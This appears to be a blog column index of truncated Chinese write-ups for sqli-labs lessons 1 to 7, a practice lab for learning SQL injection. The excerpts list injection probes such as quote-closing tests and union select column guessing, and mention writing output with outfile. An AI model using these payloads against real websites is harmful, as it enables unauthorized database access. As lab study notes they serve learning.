2.SQLi-LABS
SQLi-LABS
qwsn
努力努力再努力
展开
-
7.sqli-labs-Less7
Less 7 GET-Dump into outfile-String1、根据提示:是把字段值写入一个可以输出的文本+字符串类型注入①、找闭合类型(看源码)②、查看目录结构(使用第一关的@@basedir或者@@datadir,或者直接看靶机吧)2、一直回显查You are in… Use outfile…,很难找出闭合类型;①看Less7的index.php下的源码:SELECT * ...原创 2020-03-29 14:28:15 · 1799 阅读 · 0 评论 -
6.sqli-labs-Less6
0x01、对于前面几篇的错误问题,由于我在粘贴的时候,自动从英文的单引号转化成了中文的单引号,手动修改一下就好了一、判断注入类型:双引号字符型+GET+报错?id=1?id=1’?id=1’and’1?id=1’and’2//无变化,一直是you are in…所以是单引号的字符型?id=1"//报错,提示双引号闭合,且有limit的限制?id=1"and"1?id=1"and...原创 2020-03-26 22:02:22 · 1563 阅读 · 0 评论 -
5.sqli-labs-Less5
一、判断注入类型:?id=1//回显:You are in…?id=1’//字符型注入,limit限制?id=1’and’1 //回显you are in…?id=1’and’1’=‘2 //不回显you are in…?id=1’or’1 //回显you are in…?id=1’or’1’='2 //回显you are in…//很明显结果被处理为you are in…了?...原创 2020-03-13 16:18:06 · 1541 阅读 · 0 评论 -
4.sqli-labs-Less4
一、判断注入类型:?id=1?id=1’?id=’?id=1"?id=1")and(“1?id=1”)and"1"=("2//字符型注入,闭合手段形如: (“123”)?id=1")or(“1?id=1”)or"1"=("2//or的效果被limit限制?id=1")or"1"#?id=1")or"1"–//注释符被过滤二、猜解字段数和回显位?id=1")union...原创 2020-03-13 16:16:06 · 1540 阅读 · 0 评论 -
3.sqli-labs—Less3
一、判断注入类型:?id=1?id=1’?id=1’) and (‘1?id=1’)and’1’=(‘2?id=1’)or(‘1?id=1’)or’1’=('2//字符型注入,闭合手段形如:(‘123’),可以手动闭合?id=1’)or’1’#?id=1’)or’1’–//注释符被过滤二、猜解字段数和回显位?id=1’)union select (‘1?id=1’)uni...原创 2020-03-13 16:13:56 · 1553 阅读 · 0 评论 -
2.sqli-labs—Less2
一、判断注入类型:?id=1?id=1’?id=’//不是字符型注入?id=1 and 1?id=1 and 1=2?id=1 or 1?id=1 or 1=2?id=1 or 1#?id=1 or 1–//整型注入,有limit的限制,注释符被过滤二、猜解字段数和回显位?id=1 union select 1?id=1 union select 1,2?id=1 u...原创 2020-03-13 16:12:05 · 1492 阅读 · 0 评论 -
1.sqli-labs—Less1
一、判断注入类型:?id=1?id=1’?id=1’and’1?id=1’and’1’=‘2?id=1’or’1?id=1’or’1’='2//字符型注入,且单引号没被过滤,且可以手动闭合?id=1’and’1’#?id=1’and’1’–//注释符被过滤二、猜解字段数和回显位?id=1’union select 1’?id=1’union select 1,2’?id...原创 2020-03-13 16:09:30 · 1510 阅读 · 0 评论